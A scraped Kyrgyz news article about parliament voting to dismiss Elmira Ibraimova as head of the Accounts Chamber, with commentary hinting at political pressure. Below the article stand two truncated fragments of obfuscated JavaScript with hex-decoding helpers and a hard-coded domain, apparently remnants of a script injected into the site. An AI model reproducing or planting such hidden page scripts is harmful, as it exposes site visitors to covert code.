Menu

Эльмира айым ден соолугума байланыштуу дейт, Саляновага окшоп “Атамбаев менен иштеше албайт экенсиң”, деп ачык айтса…

Бөлүшүү:

Эльмира Ибраимованы Эсеп палатасынын аудиторлугунан (төрайымдыгынан) бошотууга 108 депутаттын 84тү макулдук берди. Бул кызматта ал 2012-жылдын 10-ноябрынан бери дурус эле иштеп келген.

Атасына окшоп чынчыл иштеген кызды Атамбаевдин командасы деле жактыра бербесе керек. Болбосо мамлекет казынасынан миллиарддаган сом каражаттарды жымырып жаткандарды таап берген Эсеп палатасынын мээнети талаага кетип, ачылган кылмыш иштер же тергөө маалында эле “бойдон эрте” түшүп калат, же сотко жетсе, ал жактан жеңил-желпи кутулуп кетишет.

Тартип органдарына 2013-жылы 49 материал берилсе, 2015-жылы 83 материал берилген. Үч жыл ичинде 5,3 млрд сомдук каржылык мыйзам бузуу, 37,6 млрд сомдук резерв жана коротулган каражаттарды таап беришкен. 4,6 млрд сомдук каражат кайтарылган.

Оппозициячыл депутат Ө.Бабанов “жаңы аудитордук команда иштесин деп эле кетип жатасызбы, кайра сизди сунуштасак иштейт белеңиз же иштен кеткениңиздин башка да себептери барбы?”деген суроосуна Эльмира айым сылап-сыйпап “ден соолугума байланыштуу азыр бир аз эс алайын, ушундай кылганым дурус болоор” деп койду. Аида Саляновага окшоп “Атамбаев менен иштеше албайт экенсиң, мени колдобой жатат” деп ачык айткан Кыз Сайкалдар да азайып баратпайбы арабызда.

 

Булак: “Ачык саясат”

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Эгер бул тексттен ката таап калсаңыз, ошол ката сөздү белгилеп, Ctrl+Enter кнопкаларын чоогу басуу менен билдирип коюңуз.

КОММЕНТАРИЙ КАЛТЫРУУ

Төмөндө көрсөтүлгөн уячаларга керектүү маалыматтарды туура киргизгениңизди текшериңиз.HTML-код киргизүүгө уруксат жок.

Captcha 88 − = 85

ОКШОШ МАКАЛАЛАР

Меню

Орфографиялык ката тууралуу Отчет

Редакцияга төмөнкү текст жөнөтүлөт: